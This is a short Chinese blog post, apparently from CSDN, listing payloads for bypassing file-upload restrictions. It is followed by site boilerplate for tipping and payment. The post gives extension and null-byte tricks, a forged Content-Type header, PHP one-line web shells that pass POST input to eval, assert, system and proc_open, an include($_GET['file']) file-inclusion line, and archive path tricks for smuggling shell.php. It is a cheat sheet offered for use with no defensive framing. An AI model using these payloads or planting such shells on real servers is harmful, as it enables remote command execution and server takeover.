文件上传漏洞payload

文章列举了多种文件上传漏洞绕过的Payload,包括更改文件扩展名、伪装MIME类型和Content-Disposition、绕过过滤函数以及利用文件包含和解压缩漏洞来上传恶意代码。这些Payload可能因目标应用的差异而效果不同。
摘要由CSDN通过智能技术生成

以下是一些文件上传漏洞绕过Payloads示例:

  1. 更改文件扩展名:
file.php.jpg
file.php%00.jpg
file.php;.jpg
file.php.\x00jpg
  1. 绕过MIME类型和Content-Disposition:
Content-Type: image/png
Content-Disposition: form-data; name="file"; filename="test.php"
  1. 过滤函数名称:
<?php eval($_POST['a']);?>
<?php assert($_POST['a']);?>
 <?php system($_POST['a']); ?>
<?php proc_open($_POST['a'], array(0=>array("pipe", "r"), 1=>array("pipe", "w"), 2=>array("pipe", "w")), $pipes); ?>
  1. 利用文件包含漏洞上传恶意文件:
<?php include($_GET['file']); ?>
  1. 利用解压缩漏洞上传恶意文件:
test.zip
test.zip#shell.php
test.zip/./shell.php
test.zip/..shell.php
test.tar.gz/shell.php

需要注意的是,这些Payload可能会因为目标应用程序的不同而不起作用。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值